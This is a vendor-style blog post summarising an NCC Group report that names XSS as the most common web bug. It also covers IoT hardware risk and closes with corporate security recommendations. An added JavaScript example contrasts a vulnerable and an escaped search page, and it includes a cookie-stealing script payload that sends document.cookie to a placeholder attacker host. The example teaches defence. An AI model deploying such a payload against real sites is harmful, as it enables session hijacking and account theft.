The tech industry moves at such a pace that, often, just as we are getting used to a trend, several more have already taken its place. The same is true of corporate cybersecurity: the variety of attacks and cybercrimes increases at a dizzying rate, which means we need to constantly refresh our knowledge of how to manage this type of risk.
However, at times it is the classics that best stand the test of time. For all the new ways of attacking a company's or a person's security, some traditional methods continue to stand out above the rest. This is what the report Nine years of bugs & coordinated vulnerability disclosure: Trends, observations & recommendations for the future, written by NCC Group, shows in its analysis of the most common web vulnerabilities.
The danger of XSS
In the last nine years, the most frequent bug on websites the world over has been Cross-site Scripting (XSS), which makes up 18% of the bugs found. This kind of security flaw allows an attacker to inject malicious script into a web page, where it runs in the victim's browser with the page's own privileges; from there it can be used to steal users' session cookies or hijack their logged-in sessions on a private portal.
The danger posed by XSS is twofold. It does not just allow the theft of user data and information, something that many other vulnerabilities set out to achieve. With XSS there is an added factor: the injected script runs on a website that, in the user's eyes, is fully trustworthy, so the browser grants it the same access as the site's own code and the user has no reason to suspect that anything is being stolen.
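To make the flaw concrete, here is an added example, not taken from the NCC Group report or from this article: a reflected XSS bug in a server-rendered search page, its hardened counterpart, and the HttpOnly cookie flag that limits the damage even when the injection succeeds. The search page, the payload, the attacker hostname and the cookie values are constructed for illustration.

```javascript
// Added example (not from the NCC Group report or this article): a reflected
// XSS bug and its fix, written as server-side HTML rendering in Node.js.
// All inputs below are constructed for illustration.

// Vulnerable: untrusted input is concatenated straight into the HTML.
function renderSearchVulnerable(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// Escape the five characters that can change HTML structure or break out of
// a quoted attribute value. This is enough for element content and quoted
// attributes; JavaScript, URL and CSS contexts need their own encoders.
function escapeHtml(input) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
  };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: the same page, with the input escaped before it is inserted.
function renderSearchSafe(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// A typical cookie-stealing payload. When a browser parses the vulnerable
// page, this runs as the site's own script and sends document.cookie to a
// host the attacker controls (attacker.example is a placeholder).
const PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

// Rough stand-in for "would the browser execute this": does the rendered
// page contain an unescaped <script> start tag?
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

// Defence in depth: a cookie set with HttpOnly is not visible to
// document.cookie, so a successful XSS still cannot read the session token.
// Parse a Set-Cookie header value and report whether the flag is present.
function cookieIsHttpOnly(setCookieHeader) {
  return setCookieHeader
    .split(';')
    .slice(1) // drop the name=value pair, keep the attributes
    .map((attr) => attr.trim().toLowerCase())
    .includes('httponly');
}

// Demonstration with the constructed payload and two constructed cookies.
console.log('vulnerable page executes payload:',
  containsScriptElement(renderSearchVulnerable(PAYLOAD)));
console.log('hardened page executes payload:  ',
  containsScriptElement(renderSearchSafe(PAYLOAD)));
console.log('session cookie readable by script:',
  !cookieIsHttpOnly('session=abc123; Path=/; HttpOnly; Secure'));
console.log('legacy cookie readable by script: ',
  !cookieIsHttpOnly('session=abc123; Path=/'));
```

The fix is output encoding at the point where untrusted data meets HTML, not input filtering; the escaper shown is only correct for element content and quoted attribute values, so data placed inside a script block, an event handler or a URL needs a context-specific encoder, and a Content Security Policy and HttpOnly cookies reduce the impact of any injection that slips through.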
The danger is in hardware too
But the potential cybersecurity risks aren't just in software. According to the NCC Group report, hardware is also exposed to a growing number of vulnerabilities, both at home and in the workplace.
Among these hardware-related risks, one case stands out: Internet of Things (IoT) devices. As well as forming part of a booming industry, they face an increase in cyberattacks that is far more pronounced than in any other technology sector.
The key: cybersecurity for hardware and software
Beyond the simple figures, the report forces us to ask ourselves several questions. How is it possible that we are still exposed to so many corporate cybersecurity risks? And, more importantly, how can a vulnerability like XSS, which has been known for almost two decades, still represent one of the largest security problems on websites around the world? The answers aren't simple, but the conclusion is: every company needs to improve its cybersecurity, both in software development and in hardware production.
To do so, they must do everything possible to minimize the risks that they could be exposed to.
1.- Investment. All large companies invest vast sums of money in developing their software, but not all of them do the same when it comes to establishing channels to check the security of that software. It is vital that security testing is treated as being as important as development itself, and that it has a dedicated budget.
2.- Communication. When a possible vulnerability is found, communication must be as quick as possible. It also needs to be multi-directional: towards developers, towards employees, towards the company's suppliers. Likewise, reports of security bugs must be communicated and managed quickly and efficiently.
3.- Hardware security. Hardware devices are still one of the main gateways for malicious software. This is why companies must also invest in appropriate hardware to minimize risks. Security cables for laptops guard against theft of the device itself, and U2F keys protect accounts against phishing and stolen passwords, so both will play an important role in protecting against cybercrime. It is also important to keep several backups on separate storage devices that can be turned to in the event of a problem.
4.- Cybersecurity solutions. Virtually no large company can face the multiple risks of corporate cybersecurity by itself, so as a general rule it must rely on external solutions. One example is Panda Adaptive Defense, which not only monitors all processes run on the company's endpoints, but also prevents, detects, and remediates possible security incidents.
The facts, then, are clear. Despite the evolution and emergence of new vulnerabilities, some of the older ones are still very much present in the business environment. This means that companies must go further, in both software and hardware, to protect their IT security.